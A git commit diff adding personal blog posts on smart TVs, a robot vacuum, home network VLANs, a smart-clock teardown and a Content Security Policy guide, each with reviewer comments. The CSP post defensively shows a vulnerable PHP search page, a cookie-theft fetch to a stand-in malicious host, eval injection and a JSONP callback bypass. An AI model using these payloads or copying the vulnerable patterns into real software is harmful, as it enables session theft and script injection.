Updates everything

Jonathan Hodgson 2025-07-11 19:05:04 +01:00
parent ea220efc38
commit 7cf34b3650
24 changed files with 1305 additions and 11 deletions

View file

@ -0,0 +1,116 @@
---
title: Why can't I buy a dumb TV?
date: 2022-12-31
tags:
- Privacy
description: Dumb TVs don't appear to be a thing anymore. I wonder why?
---
Our old TV is showing it's age a bit. It's an old Samsung. About 30" and 1080p.
It works fine, but certainly isn't what you'd call modern. I think it dates from
around 2010.
I thought I'd look and see how much it would cost to replace it -- allowing me to
use it as a monitor. I spend the majority of my time in a terminal, I don't game
and as such 4k, high refresh rate, wide screen monitors are of little interest
to me. What is of interest to me is how many terminal windows I can tile and
still use.
Anyway, I went to various sites and navigated to TVs. What I found surprised me
a little: no dumb TVs. None at all. There were smart, 4k 55" TVs for under £400,
but nothing without "smart features".
Most people assume that if I don't like something, it's because of privacy
concerns or similar. While this is partly true for TVs, it's not my main
dislike.
Smart TVs need to be maintained by the manufacturer when it is in their interest
not to do so. Think about software updates. Is Samsung / LG / Sony / Philips going to
be putting updates out for your TV in 10 or 15 years? If you think they might,
take a look at how phones have gone. I'll use Samsung as an example: they offer
3 years worth of feature updates and 4 years worth of security updates -- that is
for their flagships. Lower end phones won't even get that. This means that after
4 years, your Samsung flagship phone will not be patched for security issues.
Why would they do any different for TVs? Many smart TVs even run Android -- a
variation on the system used on most smartphones.
That just relates to the manufacturer maintaining the device. Let alone the apps
who can also [decide to stop supporting the TV](https://9to5google.com/2019/07/26/sony-tv-amazon-prime-video-september/).
It is bad enough spending hundreds (or thousands) of pounds on a phone every few
years, I don't want to do the same for a TV.
"What about apps?", you might ask. This is a non issue. I can buy a 4k fire
stick for less than £50. That is without offers. I've seen them sub-£30 on prime
day. If that only lasts 3 years, I can swap that for a new one at the time,
rather than swapping out my whole TV. I don't love the idea of replacing a set
top box every few years, but I like that idea far more than replacing a whole
TV.
Modern versions of HDMI will happily support your HDR, single remote and
surround sound needs.
So, planned obsolescence is one reason, but I don't think it is the whole story.
I'm sure it won't come as a surprise to anyone reading this blog that data
collection is a huge business these days. Targeting advertising allows companies
to charge exuberant prices for well placed ads. The amount they can charge
correlates nicely with the amount of data they can collect. It is no coincidence
that the largest advertising companies (Google and ~~Facebook~~ Meta) are also
two of the worst offenders for hoarding information.
TV manufacturers realised that they can make more money selling adverts than
they can selling TVs. The more TVs they sell, the more they can charge for
advertising. This is not just me and my tin foil hat. Vizio went public a year
or so ago and, as a result, had to publish their financials. They made over
[twice as much money selling ads as they made from TV sales](https://www.theverge.com/2021/11/10/22773073/vizio-acr-advertising-inscape-data-privacy-q3-2021).
This isn't the post to go into why I think it is important to protect your data.
If you're reading my blog, you probably already have some idea. However, it
seems that just as most of our phones, smart speakers and watches spy on us, our
TVs are trying to do the same. Maybe you don't care if big companies know what
you're watching. That is your decision, but it is a decision you should make --
not one that you should be compelled into.
It seems clear to me that planned obsolescence isn't the only factor at play
here. Sure, they want to sell you a TV every few years, but they also want to
harvest as much data as possible in order to sell ads. I don't want this.
The question then becomes, what can we do about it? Unfortunately, I haven't
found a good answer to this but here are some thoughts.
The first, and perhaps most obvious answer, is to buy a smart TV and just not
connect it to the network. With this you get the advantage of (comparably) cheap
units, and don't have the risk of data harvesting. A slight variation on this
might be isolating the TV or blocking access via a firewall rule. This doesn't,
however, mitigate the issue of security updates. Additionally, I'm told that
many TVs will either not work at all, or continuously prompt you to connect them
to the internet. I recently tried to use a Fire TV stick on a network without
internet connectivity, in order to watch content stored on a local server with
Jellyfin. The process was a long way from ideal. The home screen (where you
would normally select the app such as Jellyfin) was replaced entirely with a
network error and a prompt to go to network settings. Even apps that don't
require an internet connection were unavailable.
It was possible to launch Jellyfin by going `Settings` -> `Applications` ->
`Manage Installed Applications` -> `Jellyfin` -> `Launch Application`, but that
is not a process I want to make every time I turn on the TV, and certainly not a
solution that would get wife-approval. I have no idea if I would have similar
issues with other devices, and buying a smart TV to test that is not
particularly palatable.
Another option might be using a non-tv monitor as a TV. You can buy large
computer monitors or displays meant for digital signage. Computer monitors of
this size [are
expensive](https://www.amazon.co.uk/Philips-558M1RY-Monitor-Ambiglow-FreeSync/dp/B086X4J9KG/ref=sr_1_3?keywords=65+inch+monitor+4k&qid=1672490924&sprefix=65+inch+monitor%2Caps%2C292&sr=8-3).
Digital signage signs are also expensive, but do tend to come with the advantage
that they are designed to be on all the time. Although I couldn't find much in
the way of data, I suspect this would mean they would last longer. However,
again, they are a lot more expensive than a consumer-grade smart TV.
My plan is to do some more research and try and find a smart tv that can be used
without constant nags when not connected to the internet. If any of you know of
such a device, or have any other ideas, let me know in the comments below.
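Review bot: two typos in the opening and advertising paragraphs: "Our old TV is showing it's age" should read "its age", and "charge exuberant prices" should be "exorbitant prices". The sentence "They made over twice as much money selling ads as they made from TV sales" is also ambiguous about the measure; say whether the linked figures are revenue or profit, because the two support quite different conclusions about how TVs are priced.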

View file

@ -0,0 +1,71 @@
---
title: I Got a Robot Vacuum
date: 2022-12-31
tags:
- Privacy
- Home Assistant
description: I recently bought a Robot vacuum. I have been amazed how good it is.
---
So, you have probably seen or heard about robot vacuums. I had, although
honestly thought they were a bit of a gimmick. However, a few people I know have
them and sung their praises so I thought I'd see what the fuss was about.
I did some research and settled on the [Dreame L10 Pro](https://amzn.to/3GacxLz)
([Non-Associates
link](https://www.amazon.co.uk/Dreame-Dual-Line-Navigation-Multi-Level-Compatible/dp/B09YQ3VF3J/?th=1)).
This was in no small part because it is known to work with
[Valetudo](https://valetudo.cloud/) which allows for fully local control of the
robot. As well as a very usable web interface, it also provides MQTT control
which I use for [Home Assistant](/tag/home_assistant/) control.
It is fair to say that my expectations have been shattered by this device. I
expected it to do a reasonable job, but that I would probably have to do a
"proper" hoover once a week or so. That has not been the case. I have not had to
manually hoover the floors at all since setting it up. I have been especially
surprised by this as we have a dog who malts.
I have the vacuum set to vacuum our daytime living areas (lounge, kitchen, hall,
study) every morning at 1am. I did not expect the quality of life improvement
that we got from waking up every morning to a vacuumed house. Our bedroom is
then vacuumed during the day while we work. Apart from emptying the vacuum's
dustbin, this is entirely automatic.
The vacuum I have has a detachable cloth and water tank that it can drag behind
it and keep wet. I mostly got the device for its vacuum capabilities. However,
the addition of the mop is nice. This, too, exceeded my expectations; although
not to the same extent as the vacuum. It is nice to have, but I wouldn't buy
this particular robot for its mopping capabilities. We tend to attach this mop
and manually instruct the vacuum to mop various rooms when we go out.
## Any Cons?
Although this device has been an overwhelming positive in our life, it may not
be for everyone.
We have hard floors throughout our flat. This obviously makes vacuuming and
mopping easier for the robot. We do have a thick rug which it can struggle with
a little. However, I have taken the robot to our parents' houses who have carpet
and it has tackled even quite thick carpets without issue. If you have a lot of
very thick rugs, you may want to do a bit more research into robots that can
deal with them.
Also, the dustbin in the vacuum is quite small. I tend to empty it every other
day. Paying more can get you features such as auto-emptying dustbins which the
robot I got doesn't have.
We live in a flat, so we don't have stairs to contend with. We are due to move
very soon into a house. My long term plan is to buy a second robot, in order to
have one up stairs and one downstairs. This (obviously) makes a fully automated
vacuuming setup significantly more expensive. However, the fact that I am
planning this hopefully demonstrates how happy I am with this vacuum.
## Home Assistant
As mentioned, Valetudo allows me to control my robot entirely locally. My home
automation platform of choice is Home Assistant which is [supported by
Valetudo](https://valetudo.cloud/pages/integrations/home-assistant-integration.html).
With my smart light switches, it allows me to do things like push and hold the
light switch in order to instruct the vacuum to come and hoover the room I'm in.
It can also stop the vacuum from vacuuming every day while we are on holiday.
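Review bot: spelling in the vacuum section: "a dog who malts" should be "moults", and "sung their praises" should be "sang their praises". Since "fully local control" via Valetudo is the post's main privacy claim, the Valetudo paragraph should also say how the robot is connected (which network it sits on and whether it has any internet access); as written the reader cannot tell whether the manufacturer's cloud is merely bypassed or actually unreachable.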

View file

@ -0,0 +1,162 @@
---
title: My New Home - Network
date: 2023-02-08
tags:
- Privacy
- My New Home
description: >
I recently bought a new House. In this post, I discuss my network setup as
part of a series of posts about the setup.
---
So, we have finally moved into our new home. The buying process took far too
long, I am sick to death of dealing with solicitors, but we are now in. I hope
this will become a series of blog posts in which I detail the setup process.
This particular post will be the network.
My initial intention had been to buy some land and build a house. However, the
process of doing so in the UK was ... annoying, so instead we went for a new
build. We found the property early enough in the build process that we were able
to make various requests. One of which was for the electrician to run Cat-6
ethernet cable throughout the house before the walls were plastered. The cables
all run into our under-stairs cupboard which I managed to convince my wife to
give me as a server room.
The majority of our rooms have 2 ethernet sockets in opposite corners. Our
lounge has 4, one in each corner. Our hall and landing both have celling mounted
ports for access points. I think this is probably more than we need, but at the
time we didn't know how we'd lay the rooms out, so we put in more than we
thought we'd need. I think this was a good choice. Running ethernet is much
easier when you don't have plaster to contend with. And they are just sockets on
the walls -- they are no uglier than mains, telephone or coax sockets.
## Network Gear
In terms of the network gear, I decided to take the plunge and try TP-Links
Omada line. I think it is fair to say that in the pro-sumer arena, Ubiquity are
the most popular. However, they are also expensive. I watched a lot of YouTube
and decided that TP Link's product catered for my needs.
I bought:
* [A Router / firewall](https://amzn.to/3HwPACO) ([Non-Associates Link](https://www.amazon.co.uk/gp/product/B08SWR1K56/))
* [A Switch](https://amzn.to/3I1rB07) ([Non-Associates Link](https://www.amazon.co.uk/gp/product/B08W4PM24H/))
* [An Access Point](https://amzn.to/3RCFkxw) ([Non-Associates Link](https://www.amazon.co.uk/gp/product/B09ZF7HPFB/))
I won't go into too much detail on the individual devices I got as copying me is
a pretty bad idea. You want to make the decision based on the size of your
network, the speeds you need and the sorts of devices you want to attach.
## Network Configuration
I run the TP Link Omada Controller in a Docker container on my home server. I
have had no issues with it at all so far.
In terms of the software itself, I would say that it's not quite on a par with
Ubiquity's product, however, it is more than sufficient for my needs and I would
think more than sufficient for most home users and small / medium businesses.
The only area I found it to be a little lacking was the firewall configuration.
However, before I explain that, it would be helpful for me to explain the VLANs
I have on my network. In case you don't know, a VLAN is a virtual network. It is
useful for categorising and segregating devices. I have seen many examples
across the internet of people who setup tens of VLANs for their home network.
However, I think any security gains you may get from that are outweighed by the
added complexity maintaining it. I have opted for two VLANs.
My first VLAN is for trusted devices. Trusted devices are my computers, my
wife's computers, our phones and my server. These are able to communicate
with each other and the internet.
My second VLAN is for smart devices. These are devices that have no business
talking to each other or the internet. The only device they can communicate with
is my server running Home Assistant, an NTP server and a DNS server.
This can all be achieved easily with the Omada software. Where it is lacking is
in its inability to set up stateful firewall rules. I would like to configure
the firewall so that devices on my trusted network can communicate with devices
on the smart VLAN, and the smart devices should be able to reply. Meaning, from
my laptop, I cannot SSH into [my vacuum](/blog/i-got-a-robot-vacuum/) because
that requires 2 way communication. There is talk [on
Reddit](https://libreddit.kavin.rocks/r/HomeNetworking/comments/mrxsbg/tplink_omada_switch_acls_arent_stateful/)
that future firmware may support this, but at the moment it doesn't. I have got
around this by using my server as a jump box to SSH from as smart devices are
able to connect to this, although I'd prefer a stateful firewall solution.
I am also not able to force all DNS requests to my DNS server. On some router /
firewall solutions, you can force all outbound traffic on port 53 (DNS) to a
particular device. I have to rely on devices honouring the server specified via
DHCP. However, they seem to be doing this. They are unable to communicate with
any other servers so even if they are only honouring my choices because they
have no choice, I don't really care.
## NTP
One of the issues I overlooked when planning my network setup was that of the
Network Time Protocol (NTP). I have Chrony running on my server, but many
devices don't allow you to specify an NTP server. Instead, they just silently
fail, and leave you scratching your head whilst trying to correlate times in log
files. A particularly annoying case of this had a device default to a date in
January 2022. Whilst debugging an issue, it was January 2023 and I completely
missed the fact that it was a year out for far too long.
It should be possible to configure an NTP server via DHCP. However, the Omada
software doesn't [appear to support
it](https://community.tp-link.com/en/business/forum/topic/256680). Eventually, I
might allow my Pi Hole to manage IP assignment which would allow me to configure
the appropriate DHCP options, although that would still be reliant on devices
obeying it.
For now, I have pointed the domains I saw being used at my server, which appears
to have worked.
## Network Connection
Another issue I came across is that some mobile apps for self hosted programs
don't work without an internet connection. I [raised an
issue](https://github.com/advplyr/audiobookshelf-app/issues/566) for
Audiobookshelf. The owner responded quickly and after a few screenshots
acknowledged the bug. This is not supposed to be a knock on the app -- I have
been hugely impressed by the speed of responses I've had from the team who work
on it. It is instead supposed to highlight the fact that many tools are not
tested against the sort of non-standard setup I have here. As a result, I am
going to run into issues that I wasn't expecting.
In the case of Audiobookshelf, it looks like one of its libraries checks for
internet connectivity rather than network connectivity. After checking my
pihole's logs, it turns out that Android devices make regular (unencrypted)
requests to <http://connectivitycheck.gstatic.com>. This is used to identify
captive portals as well as verify internet connectivity. Fortunately for me,
being unencrypted, I can host a simple webserver and point that domain at it on
my network. So that's what I did. The relevant NGINX config is below:
```nginx
server {
listen 80;
listen [::]:80;
server_name connectivitycheck.gstatic.com;
location / {
return 204;
}
}
```
After this, the app started working as expected.
## WPS
WPS is a method of connecting to a network without having to enter a password.
It generally involves pushing a button on your access point and a button on your
phone / device then "magically" the device is on your network. This method of
connection has been shown to have several security weaknesses. Many modern
solutions, including Omada and Ubiquiti have stopped providing this as an
option.
I approve of this decision, it is something I would have disabled if it had been
present. However, my printer has no other way of connecting to the network. No
ethernet and no way to enter a password. I think I'll probably have to dig out
an old router that does support WPS and hope that after connecting, the printer
will have a web interface that allows me to change the network configuration. If
not, I may have to just plug a small SBC into it and run a cups server on that.
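Review bot: the Network Configuration section leaves the one cross-VLAN path underspecified. The server is described as the only host the smart VLAN may reach (Home Assistant, NTP, DNS) and is also used as the SSH jump box into the smart VLAN, so the text should state which ports the smart VLAN is allowed to reach on it (the HA, NTP and DNS ports, not SSH); without that, a reader cannot tell whether a compromised smart device could use the same jump box in reverse. Spelling and naming: "Ubiquity" appears twice in the Network Gear and Network Configuration sections but "Ubiquiti" in the WPS section; "TP-Links Omada" should be "TP-Link's"; "celling mounted" should be "ceiling mounted"; "people who setup tens of VLANs" should be "set up".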

View file

@ -0,0 +1,209 @@
---
title: My New Home - Alarm Clock
date: 2023-02-26
tags:
- Privacy
- My New Home
- Home Assistant
description: >
Part 2 of my new home setup. I discuss a Lenovo clock I got.
---
I recently picked up a [Lenovo Clock
2](https://www.lenovo.com/gb/en/p/smart-devices/smart-home/smart-home-series/lenovo-smart-clock-2/wmd00000485)
on offer. I got it for around £25. I knew it ran Android and thought
that for that price, it was worth picking one up to mess with.
After a couple of searches, I found a guide to installing other android apps on
it.
<https://forum.xda-developers.com/t/guide-installing-android-apps-on-the-lenovo-smart-clock-2.4393271/>
Once I'd installed a custom launcher, I was able to get into the android
settings and start disabling apps. I disabled the vast majority of them although
I was unable to disable the Google Assistant app. At the time of writing, there
doesn't appear to be a reliable root method for the device. There is also no USB
interface so even an adb shell was unachievable.
## Dealing with the microphones
For me to have a device like this plugged in, in my house, I want to be
absolutely certain that it isn't sending any data back to its Google mothership.
The device has a toggle on the back that switches the microphone off. This is a
software toggle. This has 2 issues. Firstly, it could conceivably be overwritten
in software. Second, it puts an icon on the screen to tell you that it's muted.
This takes up a significant part of an already small screen. So, I took the
device apart to see if the microphones were removable.
I should probably make the point here that the following procedure will void any
warranties you may have on the device. Also, this is not advice, I am not
responsible if you break it, or hurt yourself or anything else.
Disassembly was surprisingly easy. After unsticking the non-slip
ring on the bottom, there were four screws to undo -- one in each corner. After
doing this, the bottom of the device can be prized off. There are a few plastic
clips and a ribbon cable to be aware of, but if you have ever disasembed
anything before, it should be quite easy.
![Bottom off, screen screws circled](/assets/lenovo-clock/screen-screws.jpg)
This then exposes a couple of additional screws which hold the screen in place,
highlighted above. The screen can then be removed, exposing a circuit board
containing the microphones and the ambient light sensor.
![Screen removed, microphones exposed](/assets/lenovo-clock/microphone-board.jpg)
This can be removed. It is friction fit and there is another ribbon cable.
Remove the ribbon cable and the microphones and sensor can be removed. Put
everything back together and plug it in - there you go. You have a device that
**cannot** listen to you.
This may be overkill, this device is going on a VLAN that doesn't have internet
access so there should be no way for it to talk back anyway. However, defence in
depth is the best option in my opinion. If I connect it to the wrong network or
misconfigure my firewall, I don't want it sending any information back to
anyone.
## Home Assistant Setup
Next step, for me, was to set it up as a Home Assistant screen. I was able to
install [WallPanel](https://github.com/thecowan/wallpanel-android) which is a
browser that can be controlled remotely via an HTTP API or MQTT. It is similar
to the concept of [FullyKioskBrowser](https://www.fully-kiosk.com/). It is open
source though and doesn't lock features behind a paywall. I've used
FullyKioskBrowser before, and it is a very competent piece of software, but I
felt like trying something new.
I created a simple dashboard in Home Assistant, and set the start URL for
wallpanel to that dashboard. The screen is small, so you don't really want lots
of information on there. I have a clock, an alarm clock toggle, a radio
station selection (more on that later) and a few buttons.
The next part of the setup was [Browser
Mod](https://github.com/thomasloven/hass-browser_mod). This allows you to
control a browser window through Home Assistant, adding the ability to use it as
a media player or hide the navigation elements that are usually present. This
allowed me to play (local) audio on the clock. It also allows me to remove the
sidebar and top bar on the device to reclaim a little screen space.
### Radio
One of the side effects of not allowing the clock to access the internet means
it can't play internet radio (hopefully that isn't a surprise to anyone).
However, I like to be woken up to the radio. It is probably possible to add some
radio IP addresses to a whitelist. However, to make my life easier, I decided to
proxy any radio stations through my home server, which does have internet
access and the smart clock can communicate with.
For the most part this was pretty simple. I found stream URLs for a couple of
radio stations. Here is the nginx configuration for Classic FM and Absolute
Radio.
```nginx
perl_set $unix_timestamp 'sub {
time();
}';
server {
listen 443 ssl;
listen [::]:443 ssl;
ssl_certificate /etc/nginx/certs/fullchain1.pem;
ssl_certificate_key /etc/nginx/certs/privkey1.pem;
server_name radio.my.domain
include /etc/nginx/conf.d/acl.inc;
location /classicfm {
proxy_pass http://icecast.thisisdax.com/ClassicFMMP3;
}
location /absolute {
resolver 1.1.1.1;
proxy_pass http://edge-bauerabsolute-05-gos2.sharp-stream.com/absoluteradiohigh.aac?aw_0_1st.skey=${unix_timestamp}&aw_0_1st.playerid=BMUK_RPi;
}
}
```
I'm sure you can see how this can be extended for more stations. The only thing
that may not be obvious is the `unix_timestamp` variable in the absolute radio
url. I don't know why it is necessary, but for some reason it is, so I define a
variable in the `perl_set` block at the top.
So, with this, I can run
```bash
mpv https://radio.my.domain/classicfm
```
And ClassicFM will play. With BrowserMod set up for the device, I can then run
the service:
```yaml
service: media_player.play_media
target:
entity_id: media_player.alarm_clock
data:
media_content_type: music
media_content_id: "https://radio.my.domain/classicfm"
```
I would like to be able to add these URLs to the media library, however I
haven't yet found a way to do that. If anyone knows of a way, please let me
know. However, for now I created a text helper with the following:
* Off
* Absolute Radio
* Classic FM
I then created an automation:
```yaml
- alias: Clock Radio
trigger:
- platform: state
entity_id:
- input_select.bedroom_radio
condition: []
action:
- if:
- condition: state
entity_id: input_select.radio
state: Classic FM
then:
- service: media_player.play_media
data:
media_content_id: https://radio.hodgson.one/classicfm
media_content_type: music
target:
entity_id: media_player.alarm_clock
- if:
- condition: state
entity_id: input_select.radio
state: Absolute Radio
then:
- service: media_player.play_media
data:
media_content_id: https://radio.hodgson.one/absolute
media_content_type: music
target:
entity_id: media_player.alarm_clock
- if:
- condition: state
entity_id: input_select.radio
state: 'Off'
then:
- service: media_player.media_stop
data: {}
target:
entity_id: media_player.alarm_clock
mode: single
```
The last step is an automation for my alarm clock. It simply sets the input
select we set up to ClassicFM. This then plays on the speaker.
The result is below:
![Finished Clock](../../assets/lenovo-clock/screenshot.png)
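Review bot: the radio nginx config is missing a semicolon after `server_name radio.my.domain`, so the following `include /etc/nginx/conf.d/acl.inc;` is read as further arguments to `server_name` (or rejected by `nginx -t`); either way the ACL that is meant to restrict who can use the proxy is not applied, and the stream proxy would be open to anything that can reach port 443. Add the `;`. In the Clock Radio automation the trigger watches `input_select.bedroom_radio` but all three conditions test `input_select.radio`, so the branches never match unless both helpers exist and are kept in sync; use one entity id. The automation also switches from the placeholder `radio.my.domain` used earlier to `radio.hodgson.one`; pick one. Typos: "disasembed" should be "disassembled", "prized off" should be "prised off", and the helper described as a "text helper" is an `input_select` (dropdown) helper.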

360
content/blog/021-csp.md Normal file
View file

@ -0,0 +1,360 @@
---
title: Setting a good Content Security Policy
date: 2024-08-22
tags:
- Security
- Websites
description: >
Setting a good CSP can be hard. Here I go through what it is, and how to set
it up well.
---
The Content Security Policy (CSP) is a powerful security feature that helps
protect your website from cross-site scripting (XSS) attacks and other types of
code injection vulnerabilities. There are some directives that do other things,
but the bulk of this blog post will cover using the `fetch-directives`, or the
elements of the CSP that allow you to specify a allow-list of approved sources
from which resources This helps prevent malicious code from being executed on
your site.
To implement CSP, you need to set the Content-Security-Policy HTTP header on
your web server. Here's an example of what a basic CSP header might look like:
```
Content-Security-Policy: default-src 'self'; script-src 'self' https://example.com
```
Let's break down the different directives in this example:
- `default-src 'self'`: This sets the default source for all resource types to the same origin (i.e., your own website). This is a good baseline to start with.
- `script-src 'self' https://example.com`: This specifies that scripts can only be loaded from your own site (`'self'`) and the `https://example.com` domain. This helps prevent the execution of any unauthorized scripts.
It is worth noting that default-src applies to all source types that haven't
been explicitly specified. Any sources that are explicitly specified overwrite
then default-src, they are not added to it.
Consider the following:
```
Content-Security-Policy: default-src 'self'; script-src https://example.com
```
This will not allow scripts to sourced from the current origin, despite `'self'`
being in the `default-src` directive.
You can further customize the CSP header to suit your website's specific needs.
For example, you might want to allow images to be loaded from a content delivery
network (CDN), or allow fonts from a third-party font provider. Here's an
example of a more comprehensive CSP header:
```
Content-Security-Policy: default-src 'self'; script-src 'self' https://example.com; style-src 'self' https://cdn.example.com; img-src 'self' https://cdn.example.com; font-src 'self' https://fonts.gstatic.com
```
In this example, we've added directives for styles, images, and fonts, allowing
them to be loaded from specific approved sources.
It's important to note that implementing CSP is an iterative process. You'll
likely need to adjust your policy as you add new features and functionality to
your website. A good approach is to start with a strict policy and gradually
loosen it as needed, while keeping security as the top priority.
Whilst testing, it may be useful to use the
[content-security-policy-report-only](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy-Report-Only)
header. Whilst it doesn't provide any protection, it also won't break an
existing site as it only reports report violations, rather than blocking them.
## Why Bother
So, we have an idea of how to set a CSP, but not why we may want to. The main
reason to have a strong CSP set is to protect against injection attacks. The
most common of these is cross-site-scripting, where JavaScript is injected;
although other types do exist when injecting malicious css (style-injection), or
images (image-injection). The example below explains one way in which script
injection, or cross-site-scripting, is bad.
Take the following simple PHP search page:
```php
<!DOCTYPE html>
<html>
<head>
<title>Vulnerable Search Page</title>
</head>
<body>
<h1>Search Our Website</h1>
<form method="GET" action="/search.php">
Search: <input type="text" name="search">
<input type="submit" name="submit" value="Search">
</form>
<?php
if(isset($_GET['search'])) {
echo "<h2>You searched for: " . $_GET['search'] . "</h2>";
}
//Some logic to display search results
?>
</body>
</html>
```
The important factor here is that the users search query (`$_GET['search']`) is
output verbatim, without encoding or sanitising it.
If I perform a search for `<script>alert(1);</script>`, the following h2 tag will be sent to the browser:
```
<h2>You searched for: <script>alert(1);</script></h2>
```
The browser will see that, and interpret the script tag as a script it should
execute. `alert(1)` is a relatively benign function that we often use to
demonstrate the issue exists, without causing significant issues to the site.
However, now imagine changing `alert(1)` for
`fetch('https://malicious-site.com?c=' + document.cookie)`.
Now my cookies have been sent to a malicious site for the owner to do with as
they please.
The content-security-policy can be use to add a layer of protection here. When
set strictly, the browser can "know" that the script tag in the h1 tag isn't on
a pre-approved list, so the browser won't execute it.
## Potential Mistakes
So, now we know why you might want a CSP, and how to set one, we'll look at some
of the most common mistakes I see people make.
### `'unsafe-inline'` source
This source is very frequently added to a CSP, without realising it severely
limits the protection that it can offer. Most online generators will add it as,
in their current setup, most sites use inline resources. An inline resource is,
as the name suggests, most script or style resources that are not external.
So,
```html
<script>console.log("Inline");</script>
<img src="something.jpg" onclick="console.log('Also Inline')" />
<script src="/not-inline.js"></script>
<style>
body{
background-color: red; /*inline*/
}
</style>
<img style="background-color: red; /*also inline*/" />
<link rel="stylesheet" href="/not-inline.css" />
```
The problem here is that, more often than not, inline JS is the easiest way to
achieve XSS. The search example we used earlier injected an inline script tag, so
a CSP with `'unsafe-inline'` would not have prevented it from executing.
There are a number of better options here. The first is externalising scripts:
moving inline JS into an external file you control and adding that file to the
allow-list.
If that isn't possible or practical, another option is to use the special
`'<hashtype>-<hash>'` sources or `'nonce-<nonce>'` sources. These allow you to
add specific inline scripts to the allow-list without allowing all inline
scripts. Just make sure not to fall into the [potential mistakes with nonce
sources](#nonce-source).
### `'unsafe-eval'` source
The `'unsafe-eval'` source is only relevant for JavaScript. It allows scripts to
turn strings into code: `eval()`, `new Function()`, and the string forms of
`setTimeout()` and `setInterval()`. The most common use for `eval` I've seen is
as an alternative to `JSON.parse()` when targeting older JS environments that do
not have native JSON support.
So, consider the following:
```js
// Legacy pattern: parse JSON by evaluating it as JavaScript. The wrapping
// parentheses are needed because a bare `{` at the start of a statement is
// parsed as a block, not an object literal.
const jsonString = document.getElementById('someTextArea').value;
const jsonObject = eval('(' + jsonString + ')');
```
If the contents of the text area were:
```json
{
"name": "Jane Doe",
"age": 25
}
```
then:
```js
console.log(jsonObject.name); // Output: "Jane Doe"
```
However, if the contents of the text area were `alert(1)`, then we are in the
situation again whereby untrusted input is being executed as JavaScript. In this
case `JSON.parse(jsonString)` is the drop-in replacement: it parses data without
executing it. Unfortunately, there are a lot of different uses of eval, so a
single "fix" for all of them is unlikely. However, most modern frameworks do not
need `eval`, so disabling it by leaving `'unsafe-eval'` out of the policy is
preferable where possible.
### Nonce source
The nonce source allows site maintainers to allow some inline sources to be
included. We've been using JavaScript as examples, so I will continue to do so,
but note that this is also relevant for CSS (`style-src`).
```
Content-Security-Policy: script-src 'nonce-uph5Fai4'
```
```html
<!DOCTYPE html>
<html>
  <head>
    <title>Example</title>
    <script nonce="uph5Fai4">
      console.log("This will run");
    </script>
    <script>
      console.log("This won't");
    </script>
  </head>
  <body>
    <h1>Our Website</h1>
  </body>
</html>
```
For the nonce source to be effective, it must be impractical for a malicious
actor to guess the nonce. In practice, this means generating a fresh value from
a cryptographically secure random source for every response. The spec expects it
base64 encoded; 128 bits (16 random bytes) is a sensible minimum, and the 8
character value above is for illustration only. The nonce must not be re-used,
and a page carrying one must not be served from a shared cache, or every visitor
gets the same nonce. If a malicious actor can guess or observe what the nonce
is, they can simply add the attribute to their injected payload.
### JSONP Sources
JSONP (JSON with Padding) is a technique used to bypass the same-origin policy,
which is a security feature implemented by web browsers to prevent a web page
from reading responses from a different origin than the one that served the web
page.
The way JSONP works is as follows:
1. The client-side code defines a function to process the JSON data.
2. A `<script>` tag is created with its `src` attribute set to a URL that returns
   the JSON, with the name of the previously defined function passed as a query
   parameter (conventionally `callback`).
3. The server-side code wraps the JSON in a call to the function name it was given.
Here's an example:
Client-side HTML:
```html
<script>
  function handleResponse(data) {
    console.log(data);
  }
</script>
<script src="https://example.com/data?callback=handleResponse"></script>
```
The response to that script request would look something like:
```javascript
handleResponse({
  "name": "John Doe",
  "age": 30
});
```
JSONP was a popular technique in the past, as it allowed developers to make
cross-domain requests without running into the same-origin policy.
However, if an attacker is able to inject a script tag into a document, and a
CDN that is known to host JSONP endpoints is on the allow-list, they could
include something like
```html
<script src="https://example.com/data?callback=alert(1);handleResponse"></script>
```
Implementations that reflect the callback name without validating it will then
return the following, which the browser executes because it came from an
allow-listed host:
```javascript
alert(1);handleResponse({
  "name": "John Doe",
  "age": 30
});
```
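To show exactly where the reflection happens, here is an added example (my own code, not from the post or any particular CDN) of a JSONP endpoint in two forms: one that reflects `callback` verbatim, and one that only accepts a JavaScript identifier. `handleJsonpRequest` and `SAMPLE_DATA` are scaffolding invented for the example.

```javascript
// Constructed sample payload standing in for whatever the endpoint serves.
const SAMPLE_DATA = { name: 'John Doe', age: 30 };

// Vulnerable form: whatever arrives in ?callback= is reflected into the script.
function jsonpReflected(callback, payload) {
  return `${callback}(${JSON.stringify(payload)});`;
}

// Only a plain JavaScript identifier (optionally dotted, e.g. app.onData) is
// accepted. Rejecting rather than "cleaning" means input such as
// `alert(1);handleResponse` never reaches the response body.
const CALLBACK_NAME = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;

function jsonpValidated(callback, payload) {
  if (!CALLBACK_NAME.test(callback)) {
    throw new Error('invalid JSONP callback name');
  }
  return `${callback}(${JSON.stringify(payload)});`;
}

// Tiny request handler so both variants can be driven from a URL. `validate`
// selects the hardened version; this is scaffolding for the example, not a
// real server. Note that URLSearchParams splits on '&' only, so the ';' in
// the attacker's callback value arrives intact.
function handleJsonpRequest(url, validate) {
  const callback = new URL(url).searchParams.get('callback') || 'callback';
  try {
    const body = validate ? jsonpValidated(callback, SAMPLE_DATA)
                          : jsonpReflected(callback, SAMPLE_DATA);
    return {
      status: 200,
      headers: {
        // Declare the body as script and forbid sniffing so it cannot be
        // reinterpreted as another content type.
        'Content-Type': 'application/javascript; charset=utf-8',
        'X-Content-Type-Options': 'nosniff',
      },
      body,
    };
  } catch (err) {
    return { status: 400, headers: { 'Content-Type': 'text/plain' }, body: err.message };
  }
}
```

Even the validated form is still a script that the browser will execute from an allow-listed host: the attacker can no longer prepend statements, but they still choose which global function is called with the data. From the site's side, pinning the allow-list to the specific file you need (below) is the more reliable fix, since it does not depend on how the CDN wrote its endpoints.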
JSONP is now generally discouraged, in favour of
[CORS](https://jakearchibald.com/2021/cors/), which allows site owners to
explicitly allow some resources to be requested across origins. However, note
that many CDNs host JSONP endpoints, so even if your site doesn't use them,
allowing a domain that hosts them is enough to provide a CSP bypass in many
situations. CSP source expressions can include a path, so subdirectories or even
specific files can be added to the allow-list. If you are unsure whether a CDN
provides JSONP endpoints, you may wish to explicitly allow a specific file on
the CDN rather than all files.
For example:
```
Content-Security-Policy: script-src https://example.com/file.js;
```
as opposed to
```
Content-Security-Policy: script-src https://example.com/;
```
One caveat: if the allow-listed URL responds with a redirect, the browser only
checks the redirect target against the scheme, host and port of the source
expression, not its path, so a path-pinned entry is only as tight as the CDN's
redirect behaviour.
